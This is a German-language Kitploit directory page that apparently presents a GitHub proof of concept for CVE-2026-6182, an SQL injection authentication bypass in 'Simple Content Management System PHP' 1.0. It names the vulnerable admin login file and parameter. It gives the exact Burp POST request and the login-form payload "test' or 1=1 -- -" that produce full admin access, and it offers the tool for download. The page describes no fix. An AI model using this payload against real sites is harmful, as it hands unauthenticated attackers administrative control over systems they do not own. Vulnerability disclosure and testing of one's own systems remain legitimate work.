Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-6182-SQLI-auth — Proof-of-Concept für die Umgehung der Authentifizierung per SQL-Injection im Simple Content Management System PHP, das nicht authentifizierten Angreifern ermöglicht, über einen manipulierten Benutzerparameter Administratorzugriff zu erlangen. | Kitploit
Tools/GitHubGitHub/xmyronn/cve-2026-6182-sqli-auth
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierung
GitHubxmyronn/cve-2026-6182-sqli-auth

CVE-2026-6182-SQLI-auth

Proof-of-Concept für die Umgehung der Authentifizierung per SQL-Injection im Simple Content Management System PHP, das nicht authentifizierten Angreifern ermöglicht, über einen manipulierten Benutzerparameter Administratorzugriff zu erlangen.

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

SQL Injection Authentication Bypass – Einfaches Content-Management-System PHP

Beschreibung

Eine SQL-Injection-Schwachstelle besteht auf der Admin-Login-Seite des einfachen Content-Management-Systems PHP. Der Parameter user wird nicht bereinigt, bevor er an die SQL-Abfrage übergeben wird, wodurch ein nicht authentifizierter Angreifer die Authentifizierung umgehen und vollen Admin-Zugriff erlangen kann.


Schwachstellendetails

  • Typ: SQL Injection (CWE-89)
  • Auswirkung: Authentifizierungsumgehung – wir erhalten vollen Admin-Zugriff
  • Betroffene Datei: /web/admin/login.php
  • Betroffener Parameter: user
  • Angriffsvektor: Remote, nicht authentifiziert **Schweregrad: Kritisch

Anbieter

code-projects.org

Produkt

Einfaches Content-Management-System PHP

Version

1.0


Proof of Concept (PoC)

Schritt 1 – Senden Sie die folgende Anfrage in Burp:

root@kitploit:~
POST /web/admin/login.php HTTP/1.1
Host: [target]
Content-Type: application/x-www-form-urlencoded

user=test'+or+1%3D1+--+-&password=test&submit=Login

oder fügen Sie dies einfach auf der Login-Seite hinzu Screenshot 2026-04-05 051755

Schritt 2 – Login-Formular mit Payload:

test' or 1=1 -- -

Schritt 3 – Zugriff auf das Admin-Panel gewährt:

Screenshot 2026-04-05 054510

Auswirkung

Ein nicht authentifizierter Remote-Angreifer kann den Admin-Login vollständig umgehen, ohne Zugangsdaten zu kennen, und erhält die volle Kontrolle über das Admin-Panel, einschließlich des Hinzufügens von Inhalten.


Autor

Imad Alvi


Referenz

https://code-projects.org/simple-content-management-system-in-php-with-source-code/

Tool herunterladen